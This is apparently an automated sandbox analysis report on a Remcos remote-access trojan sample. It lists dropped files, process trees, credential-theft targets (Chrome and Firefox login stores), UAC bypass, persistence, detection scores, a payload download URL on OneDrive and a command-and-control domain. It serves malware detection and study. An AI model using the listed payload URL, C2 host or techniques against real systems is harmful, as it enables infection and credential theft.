              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Process created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pif
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Process created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pif
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_00434C52 cpuid | 6_1_00434C52
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess | 0_2_02D7D5D0
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA | 0_2_02D65A90
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: GetLocaleInfoA | 0_2_02D6A7CC
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: GetLocaleInfoA | 0_2_02D6A780
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA | 0_2_02D65B9C
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess | 0_2_02D7D5D0
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess | 0_2_02D85FA0
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: EnumSystemLocalesW | 6_1_00452036
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 6_1_004520C3
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoW | 6_1_00452313
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: EnumSystemLocalesW | 6_1_00448404
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 6_1_0045243C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoW | 6_1_00452543
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 6_1_00452610
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoA | 6_1_0040F8D1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoW | 6_1_004488ED
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 6_1_00451CD8
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: EnumSystemLocalesW | 6_1_00451F50
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: EnumSystemLocalesW | 6_1_00451F9B
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: EnumSystemLocalesW | 10_1_00452036
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 10_1_004520C3
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoW | 10_1_00452313
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: EnumSystemLocalesW | 10_1_00448404
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 10_1_0045243C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoW | 10_1_00452543
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 10_1_00452610
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoA | 10_1_0040F8D1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetLocaleInfoW | 10_1_004488ED
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 10_1_00451CD8
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: EnumSystemLocalesW | 10_1_00451F50
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: EnumSystemLocalesW | 10_1_00451F9B
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Code function: CoInitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess | 15_2_02E3D5D0
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA | 15_2_02E25A90
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Code function: GetLocaleInfoA | 15_2_02E2A7CC
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA | 15_2_02E25B9B
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess | 15_2_02E45F9F
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: 0_2_02D691C8 GetLocalTime | 0_2_02D691C8
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_0041B60D GetComputerNameExW,GetUserNameW | 6_1_0041B60D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free | 6_1_00449190
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: 0_2_02D6B748 GetVersionExA | 0_2_02D6B748
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr | Binary or memory string: cmdagent.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr | Binary or memory string: quhlpsvc.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr | Binary or memory string: avgamsvr.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr | Binary or memory string: TMBMSRV.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr | Binary or memory string: Vsserv.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr | Binary or memory string: avgupsvc.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr | Binary or memory string: avgemc.exe
              Source: udVh4Ist4Z.exe, udVh4Ist4Z.exe, 00000000.00000002.2148072025.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2162661886.000000001517D000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.dr | Binary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              Source: Yara match | File source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 6_1_0040BA12
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 10_1_0040BA12
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 6_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: \key3.db | 6_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 10_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: \key3.db | 10_1_0040BB30

              Remote Access Functionality

              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
              Source: Yara match | File source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: cmd.exe | 6_1_0040569A
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: cmd.exe | 10_1_0040569A
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information1
              Scripting
              1
              Valid Accounts
              3
              Native API
              1
              Scripting
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              12
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Shared Modules
              1
              DLL Side-Loading
              1
              Bypass User Account Control
              2
              Obfuscated Files or Information
              111
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol111
              Input Capture
              21
              Encrypted Channel
              Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts12
              Command and Scripting Interpreter
              1
              Valid Accounts
              1
              Valid Accounts
              1
              Timestomp
              2
              Credentials In Files
              1
              System Service Discovery
              SMB/Windows Admin Shares3
              Clipboard Data
              1
              Remote Access Software
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Service Execution
              1
              Windows Service
              11
              Access Token Manipulation
              1
              DLL Side-Loading
              NTDS1
              System Network Connections Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd21
              Registry Run Keys / Startup Folder
              1
              Windows Service
              1
              Bypass User Account Control
              LSA Secrets3
              File and Directory Discovery
              SSHKeylogging113
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts321
              Process Injection
              11
              Masquerading
              Cached Domain Credentials34
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items21
              Registry Run Keys / Startup Folder
              1
              Valid Accounts
              DCSync131
              Security Software Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Access Token Manipulation
              Proc Filesystem1
              Process Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt321
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Behavior Graph (ID: 1430910, Sample: udVh4Ist4Z.exe, Startdate: 24/04/2024, Architecture: WINDOWS, Score: 100)

Contacted hosts: dual-spov-0006.spov-msedge.net (13.107.137.11, 443, 49710, 49711, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States); xirfeg.sn.files.1drv.com; 4 other IPs or domains.

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 12 other signatures.

Process tree recovered from the graph:
• udVh4Ist4Z.exe (started)
  • dropped: C:\Users\Public\Libraries\nmfsxfjX.pif (PE32); C:\Users\Public\Libraries\netutils.dll (PE32+); C:\Users\Public\Libraries\easinvoker.exe (PE32+); C:\Users\Public\Xjfxsfmn.url (MS)
  • signatures: Creates multiple autostart registry keys; Drops PE files with a suspicious file extension; Writes to foreign memory regions
  • started: nmfsxfjX.pif, extrac32.exe, cmd.exe
    • nmfsxfjX.pif: dropped C:\ProgramData\Remcos\remcos.exe (PE32); signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionalty to change the wallpaper; 4 other signatures; started remcos.exe
    • extrac32.exe: dropped C:\Users\Public\Libraries\Xjfxsfmn.PIF (PE32); signature: Drops PE files with a suspicious file extension
    • cmd.exe: started conhost.exe
• Xjfxsfmn.PIF (started)
  • signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Allocates memory in foreign processes
  • started: nmfsxfjX.pif
    • nmfsxfjX.pif: dropped C:\Users\user\AppData\Roaming\...\remcos.exe (PE32); signatures: Creates autostart registry keys with suspicious names; Creates multiple autostart registry keys; started remcos.exe
• Xjfxsfmn.PIF (started)
  • signature: Sample uses process hollowing technique
  • started: nmfsxfjX.pif
    • nmfsxfjX.pif: started remcos.exe
• 3 other processes

Source | Detection | Scanner | Label
• udVh4Ist4Z.exe | 63% | ReversingLabs | Win32.Trojan.Remcos
• udVh4Ist4Z.exe | 66% | Virustotal |
• udVh4Ist4Z.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
• C:\Users\Public\Libraries\netutils.dll | 100% | Avira | TR/AVI.Agent.rqsyc
• C:\Users\Public\Libraries\Xjfxsfmn.PIF | 100% | Joe Sandbox ML |
• C:\ProgramData\Remcos\remcos.exe | 3% | ReversingLabs |
• C:\ProgramData\Remcos\remcos.exe | 0% | Virustotal |
• C:\Users\Public\Libraries\Xjfxsfmn.PIF | 63% | ReversingLabs | Win32.Trojan.Remcos
• C:\Users\Public\Libraries\Xjfxsfmn.PIF | 66% | Virustotal |
• C:\Users\Public\Libraries\easinvoker.exe | 0% | ReversingLabs |
• C:\Users\Public\Libraries\easinvoker.exe | 0% | Virustotal |
• C:\Users\Public\Libraries\netutils.dll | 83% | ReversingLabs | Win64.Trojan.Acll
• C:\Users\Public\Libraries\netutils.dll | 68% | Virustotal |
• C:\Users\Public\Libraries\nmfsxfjX.pif | 3% | ReversingLabs |
• C:\Users\Public\Libraries\nmfsxfjX.pif | 0% | Virustotal |
• C:\Users\user\AppData\Roaming\Remcos\remcos.exe | 3% | ReversingLabs |
• C:\Users\user\AppData\Roaming\Remcos\remcos.exe | 0% | Virustotal |
              No Antivirus matches
Source | Detection | Scanner | Label
• dual-spov-0006.spov-msedge.net | 0% | Virustotal |
Source | Detection | Scanner | Label
• http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | URL Reputation | safe
• http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
• http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
• https://sectigo.com/CPS0 | 0% | URL Reputation | safe
• http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
• http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
• http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing
• http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | URL Reputation | safe
• http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
• http://ocsp.sectigo.com0C | 0% | URL Reputation | safe
• kenoss.duckdns.org | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
• dual-spov-0006.spov-msedge.net | 13.107.137.11 | true | true | | unknown
• onedrive.live.com | unknown | unknown | false | | high
• xirfeg.sn.files.1drv.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
• https://onedrive.live.com/download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pUf | false | | high
• kenoss.duckdns.org | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
• http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
